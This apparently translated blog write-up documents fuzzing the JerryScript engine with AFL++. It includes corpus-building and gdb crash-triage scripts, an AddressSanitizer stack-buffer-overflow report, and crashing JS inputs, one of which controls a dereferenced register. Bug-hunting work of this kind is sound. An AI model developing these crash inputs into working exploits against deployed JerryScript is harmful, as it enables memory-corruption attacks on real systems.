    js_files = []
    for root, _, files in os.walk(CLONE_DIR):
        # Check if the file is inside one of the ES5 directories
        if any(es5_dir in root.replace("\\", "/") for es5_dir in ES5_TEST_DIRS):
            for file in files:
                if file.endswith(".js"):
                    js_files.append(os.path.join(root, file))
    return js_files

def prepare_corpus(js_files):
    os.makedirs(CORPUS_DIR, exist_ok=True)
    selected_files = js_files[:NUM_FILES]
    print(f"Copying {len(selected_files)} files to corpus directory...")
    existing_names = set()

    for path in selected_files:
        filename = os.path.basename(path)
        name, ext = os.path.splitext(filename)

        # Avoid duplicates by renaming with suffix if needed
        original_filename = filename
        suffix = 1
        while filename in existing_names:
            filename = f"{name}_{suffix}{ext}"
            suffix += 1

        existing_names.add(filename)
        shutil.copy(path, os.path.join(CORPUS_DIR, filename))

    print("Corpus preparation complete.")

if __name__ == "__main__":
    clone_test262()
    all_js_files = gather_es5_js_files()
    if len(all_js_files) == 0:
        print("No ES5 JS files found in test262 repo!")
    else:
        prepare_corpus(all_js_files)
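The feedback loop that AFL runs over such a corpus can be sketched with a toy target. Everything here is illustrative: the target function, its branch ids, and the single-byte mutation are simplified stand-ins, not how AFL measures coverage or mutates inputs.

```python
import random

def target(data):
    """Toy target: return the set of branch ids that the input reached."""
    covered = {0}
    if data[:1] == b"v":
        covered.add(1)
        if data[1:2] == b"a":
            covered.add(2)
            if data[2:3] == b"r":
                covered.add(3)
    return covered

def mutate(data, rng):
    """Overwrite one random byte, a tiny stand-in for AFL's havoc stage."""
    buf = bytearray(data)
    buf[rng.randrange(len(buf))] = rng.randrange(256)
    return bytes(buf)

def fuzz(seeds, rounds, rng):
    """Keep a mutated input only when it reaches a branch not seen before."""
    corpus = list(seeds)
    seen = set()
    for seed in corpus:
        seen |= target(seed)
    for _ in range(rounds):
        candidate = mutate(rng.choice(corpus), rng)
        coverage = target(candidate)
        if not coverage <= seen:  # new branch reached: keep the input
            seen |= coverage
            corpus.append(candidate)
    return corpus, seen

corpus, seen = fuzz([b"xxxx"], 20000, random.Random(1))
print(sorted(seen))
print(corpus)
```

Each kept input becomes a stepping stone for the next branch, which is why byte-level mutation can slowly spell out a keyword but struggles with whole nested syntactic structures.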

Fuzzing

afl-fuzz -i input -o output -b 2 -a text -M master -- ./jerry-libfuzzer
AFL_USE_ASAN=1 afl-fuzz -i input -o output -b 4 -a text -S sanitizer -c 0 -l 2AT -P exploit -p exploit -- ./jerry-libfuzzer

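A crash came very quickly. As you can see, the JS inputs AFL builds are really no different from garbage. In other words, JerryScript can crash with a segfault as early as syntax analysis or even lexical analysis.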

Processing the results

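It sounds a bit absurd, but after a day of unattended running AFL had collected 543 crashes. Most of them were null pointer dereferences, though, so I decided to do some simple filtering of the useless crashes. Using gdb's Python module, I batch-debug the crash inputs: after the segfault, extract the assembly instruction at the faulting location, find the register used in the [reg + offset] dereference (register indirect addressing), then ask gdb for that register's value, and if the value is a large number, save the input separately.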

import gdb
import os
import shlex
import shutil
import re
from pathlib import Path

# ====== Configuration ======
CRASH_DIR = Path("./crashes")
VALID_DIR = Path("./valid")
LOG_DIR = Path("./logs")
MODE = "copy"   # "copy" or "link"
PATTERN = "cafebabe"   # if NOT found in crash bt/output -> save to VALID_DIR
USE_STDIN = False    # If True, run "run < file" to feed the file on stdin
# Note: timeouts are not enforced inside gdb-embedded script; if you need per-run
# timeouts, run gdb under an external timeout wrapper (e.g. GNU timeout) or use
# the external/python+subprocess approach.
# ===========================

CRASH_DIR = CRASH_DIR.resolve()
VALID_DIR = VALID_DIR.resolve()
LOG_DIR = LOG_DIR.resolve()

x86_64_registers = [
    "rax", "rbx", "rcx", "rdx",
    "rsp", "rbp", "rsi", "rdi",
    "r8", "r9", "r10", "r11",
    "r12", "r13", "r14", "r15"
]

for d in (VALID_DIR, LOG_DIR):
    d.mkdir(parents=True, exist_ok=True)

# helper: unique destination path (avoid overwriting)
def unique_dest(dest: Path) -> Path:
    if not dest.exists():
        return dest
    i = 1
    while True:
        candidate = dest.with_name(dest.name + f".{i}")
        if not candidate.exists():
            return candidate
        i += 1

def install_file(src: Path) -> Path:
    dest = VALID_DIR / src.name
    dest = unique_dest(dest)
    if MODE == "link":
        # try symlink to absolute path
        try:
            os.symlink(str(src.resolve()), str(dest))
        except OSError:
            shutil.copy2(src, dest)
    else:
        shutil.copy2(src, dest)
    return dest

CRASH_PATTERNS = [
    r"Program received signal",
    r"SIGSEGV",
    r"SIGABRT",
    r"Segmentation fault",
    r"SIGILL",
    r"SIGFPE",
    r"^#0",            # backtrace frame 0
    r"AddressSanitizer",
    r"ASAN:",
    r"terminate called",
]

_crash_re = re.compile("|".join("(?:" + p + ")" for p in CRASH_PATTERNS), flags=re.I | re.M)

def detect_crash(text: str) -> bool:
    return bool(_crash_re.search(text))

# Turn off pagination so gdb.execute(..., to_string=True) returns full text
try:
    gdb.execute("set pagination off")
except Exception:
    pass

# The program to run is the one passed with --args ./jerry when launching gdb.
# gdb already knows the executable from --args; we will just set program args each run.
files = sorted([p for p in CRASH_DIR.iterdir() if p.is_file()])

summary = {"processed": 0, "crashes": 0, "saved": 0, "no_crash": 0}

for infile in files:
    summary["processed"] += 1
    name = infile.name
    logfile = LOG_DIR / (name + ".log")
    print("---- Processing:", name)

    # Set args or use stdin redirection
    if USE_STDIN:
        # clear any args (not necessary, but explicit)
        try:
            gdb.execute("set args")
        except Exception:
            pass
        run_cmd = "run < " + shlex.quote(str(infile))
    else:
        # set argv for the debugged program to the filename
        # (if your program accepts multiple args, adjust as needed)
        try:
            gdb.execute("set args " + shlex.quote(str(infile)))
        except Exception:
            pass
        run_cmd = "run"

    # Execute run and capture textual output
    try:
        out_run = gdb.execute(run_cmd, to_string=True)
    except gdb.error as e:
        # gdb.error may be thrown if the program exited in a way gdb treats specially;
        # capture the string representation and continue to collect bt below.
        out_run = str(e)

    # After run, collect a backtrace (best-effort)
    try:
        out_bt = gdb.execute("bt full", to_string=True)
    except Exception:
        try:
            out_bt = gdb.execute("bt", to_string=True)
        except Exception:
            out_bt = ""

    combined = out_run + "\n" + out_bt

    # Save log
    with logfile.open("w", encoding="utf-8", errors="replace") as f:
        f.write("COMMAND: " + run_cmd + "\n\n")
        f.write("=== RUN OUTPUT ===\n")
        f.write(out_run + "\n\n")
        f.write("=== BACKTRACE ===\n")
        f.write(out_bt + "\n")

    # Detect crash
    if detect_crash(combined):
        summary["crashes"] += 1
        crash_line = gdb.execute('x/i $rip', to_string=True)
        valid = False
        if "[" not in crash_line:
            continue
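        # Text of the memory operand, e.g. "[rdi+0x8" (assumes Intel disassembly flavor)
        operand = crash_line[crash_line.index("["):crash_line.index("]")]
        for reg in x86_64_registers:
            # Read the register as an unsigned integer instead of parsing `p` output as hex
            if reg in operand and (int(gdb.parse_and_eval(f"${reg}")) & 0xFFFFFFFFFFFFFFFF) > 8:
                valid = True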
        if not valid:
            continue
        print("  -> Valid crash detected. Log:", logfile)
        if PATTERN.lower() in combined.lower():
            print(f"     -> pattern '{PATTERN}' FOUND in backtrace/output. Not saving.")
        else:
            dest = install_file(infile)
            summary["saved"] += 1
            print(f"     -> pattern '{PATTERN}' NOT found. Saved to:", dest)
    else:
        summary["no_crash"] += 1
        print("  -> No crash detected. Log:", logfile)

    # Attempt to kill inferior if still running so we can restart cleanly next time
    try:
        gdb.execute("kill", to_string=True)
    except Exception:
        # ignore; keep going
        pass

# Final summary
print("\nDone.")
print("Summary:")
for k, v in summary.items():
    print(f"  {k}: {v}")
print("Logs:", LOG_DIR)
print("Valid candidates:", VALID_DIR)

# End of gdb_run.py
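Stripped of the gdb plumbing, the filter in the script above boils down to the heuristic below. It is a standalone sketch: the instruction strings and register values are made-up examples, and it assumes Intel-syntax disassembly, where memory operands appear in square brackets.

```python
import re

# 64-bit general purpose registers: rax..rdx, rsp/rbp, rsi/rdi, r8..r15.
_REG = re.compile(r"\b(r(?:[a-d]x|[sb]p|[sd]i|\d+))\b")

def memory_operand_registers(insn):
    """Return the registers used inside the [ ... ] operand of an instruction."""
    operand = re.search(r"\[([^\]]*)\]", insn)
    if not operand:
        return []
    return _REG.findall(operand.group(1))

def is_interesting(insn, regs, threshold=8):
    """True if an address register holds something other than a near-NULL value.

    `threshold` mirrors the `> 8` comparison in the script; raising it filters
    out more small-offset NULL dereferences.
    """
    return any(regs.get(r, 0) > threshold for r in memory_operand_registers(insn))

insn = "mov eax, DWORD PTR [rdi+0x10]"
print(memory_operand_registers(insn))                     # ['rdi']
print(is_interesting(insn, {"rdi": 0}))                   # False: plain NULL dereference
print(is_interesting(insn, {"rdi": 0x646573610A20650A}))  # True: attacker-looking pointer
```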

After filtering, I found a very interesting crash:

$ ./jerry-asan /storage/jsfuzz/valid/id:000005,sig:11,src:005743,time:469380,execs:12877861,op:havoc,rep:4
=================================================================
==1365920==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7b6b9b700098 at pc 0x558aff052c4d bp 0x7ffcb9f80e60 sp 0x7ffcb9f80e50
READ of size 1 at 0x7b6b9b700098 thread T0
    #0 0x558aff052c4c in scanner_create_variables (/storage/jsfuzz/jerry-asan+0x78c4c) (BuildId: 85560800a62467c72ec57dc61008c1abe723d70b)
    #1 0x558aff0551bc in parser_parse_function_arguments.lto_priv.0 (/storage/jsfuzz/jerry-asan+0x7b1bc) (BuildId: 85560800a62467c72ec57dc61008c1abe723d70b)
    #2 0x558aff0585c8 in parser_parse_function (/storage/jsfuzz/jerry-asan+0x7e5c8) (BuildId: 85560800a62467c72ec57dc61008c1abe723d70b)
    #3 0x558aff0a26bc in lexer_construct_function_object (/storage/jsfuzz/jerry-asan+0xc86bc) (BuildId: 85560800a62467c72ec57dc61008c1abe723d70b)
    #4 0x558aff0a6a77 in parser_parse_class (/storage/jsfuzz/jerry-asan+0xcca77) (BuildId: 85560800a62467c72ec57dc61008c1abe723d70b)
    #5 0x558aff0b6198 in parser_parse_statements (/storage/jsfuzz/jerry-asan+0xdc198) (BuildId: 85560800a62467c72ec57dc61008c1abe723d70b)
    #6 0x558aff057d49 in parser_parse_source.lto_priv.0 (/storage/jsfuzz/jerry-asan+0x7dd49) (BuildId: 85560800a62467c72ec57dc61008c1abe723d70b)
    #7 0x558aff008764 in jerry_parse_common.lto_priv.0 (/storage/jsfuzz/jerry-asan+0x2e764) (BuildId: 85560800a62467c72ec57dc61008c1abe723d70b)
    #8 0x558aff0bf0bc in jerryx_source_parse_script (/storage/jsfuzz/jerry-asan+0xe50bc) (BuildId: 85560800a62467c72ec57dc61008c1abe723d70b)
    #9 0x558afeff6be3 in main (/storage/jsfuzz/jerry-asan+0x1cbe3) (BuildId: 85560800a62467c72ec57dc61008c1abe723d70b)
    #10 0x7f6b9da27674  (/usr/lib/libc.so.6+0x27674) (BuildId: 4fe011c94a88e8aeb6f2201b9eb369f42b4a1e9e)
    #11 0x7f6b9da27728 in __libc_start_main (/usr/lib/libc.so.6+0x27728) (BuildId: 4fe011c94a88e8aeb6f2201b9eb369f42b4a1e9e)
    #12 0x558afeff72e4 in _start (/storage/jsfuzz/jerry-asan+0x1d2e4) (BuildId: 85560800a62467c72ec57dc61008c1abe723d70b)

Address 0x7b6b9b700098 is located in stack of thread T0 at offset 152 in frame
    #0 0x558aff055ffe in parser_parse_source.lto_priv.0 (/storage/jsfuzz/jerry-asan+0x7bffe) (BuildId: 85560800a62467c72ec57dc61008c1abe723d70b)

  This frame has 6 object(s):
    [32, 33) 'flags' (line 2041)
    [48, 49) 'flags' (line 2063)
    [64, 80) 'branch' (line 2253)
    [96, 112) 'literal'
    [128, 152) 'scanner_info_end' (line 2115) <== Memory access at offset 152 overflows this variable
    [192, 792) 'context' (line 1988)
HINT: this may be a false positive if your program uses some custom stack unwind mechanism, swapcontext or vfork
      (longjmp and C++ exceptions *are* supported)
SUMMARY: AddressSanitizer: stack-buffer-overflow (/storage/jsfuzz/jerry-asan+0x78c4c) (BuildId: 85560800a62467c72ec57dc61008c1abe723d70b) in scanner_create_variables
Shadow bytes around the buggy address:
  0x7b6b9b6ffe00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x7b6b9b6ffe80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x7b6b9b6fff00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x7b6b9b6fff80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x7b6b9b700000: f1 f1 f1 f1 01 f2 01 f2 00 00 f2 f2 f8 f8 f2 f2
=>0x7b6b9b700080: 00 00 00[f2]f2 f2 f2 f2 00 00 00 00 00 00 00 00
  0x7b6b9b700100: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x7b6b9b700180: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x7b6b9b700200: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x7b6b9b700280: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x7b6b9b700300: 00 00 00 f3 f3 f3 f3 f3 f3 f3 f3 f3 f3 f3 f3 f3
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
==1365920==ABORTING

The input is:

class MyError extends Error {7667111111111111111;;;;;;;static
 { throwased = true;
  d = trsert.s}.defeuse(resourcd = true;
 new MyError(); });
stack.defer(function () {});
assert.throws(MyError, functction (# {
 Csu 12), .defer(function41024448kTtrspose()&
});

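Another input makes RDI, the register used for register indirect addressing, hold the value 0x646573610a20650a ('\ne \nased'), which is part of the input itself. Interestingly, it does not trigger Address Sanitizer, which suggests that ASAN likely changes the memory layout of some stack frames. (I trimmed it by hand, otherwise this input is really long and ugly.)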

class MyE{7667;;667;;sta;7;;667;;s;;#;statTtra;sta;7;;667;;;;;;;;s;;#;statTtra;;';s;;#at;#;statTtra;;';s;;#atTtra;;#;;sta;;;
e 
ased = 
class{76671;
6
;
s;;;;;;;;;;static
ase
6
e 
ased = 
class{76671;
6
;
s;;;;;;;;;;static
ased6671;
6
e 
ased = 
class{76671;
6
;
s;;;;;;;;;;static
as}}}}|}}}Of(}}|}csleO}}}}|}}}Of}}|}02000(1167E0Y.u(3}}}}}}}}}PisleO}}}}|}}}Of}}|}02000(1167E000002000(11676cY.u(Pisle}}}}PisleO}}}}|}}}OfInfinityaa, new .u9PisleOaaaaa!pa}}}}}}PisleO}}}}|}}}Of
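To confirm that the RDI value really is a slice of the input, decode it as bytes. x86-64 is little-endian, so the lowest byte of the register corresponds to the first byte in memory:

```python
rdi = 0x646573610A20650A

# Little-endian: the least significant byte comes first in memory.
raw = rdi.to_bytes(8, "little")
print(raw)  # b'\ne \nased'
```

The sequence "e", space, newline, "ased" appears several times in the trimmed input above, so the pointer being dereferenced was overwritten with attacker-controlled text.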

There are many more crash inputs similar to it, and it is quite obvious that JerryScript's handling of JS class private field names is badly broken.

Summary

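Honestly, this fuzzing run was not very meaningful. To fuzz compiler-like software you should use a structured fuzzer rather than one like AFL++ that mostly relies on random byte mutation; otherwise the inputs do not even pass syntax checking and it is hard to dig any deeper. Later I may try fuzzilli, or consider hand-writing a fuzzer of my own (big promises in progress).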

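Having recently stepped into real-world binary exploitation, I have seen far too many AI-fabricated exploits and meaningless "high severity" CVEs. Bug hunting comes with thrillingly high bug bounties, yet few organizations are willing to reward bug patches. Is this a disconnect between security research and software development? (The reality is that many developers resent these exaggerated or even fake vulnerability reports.)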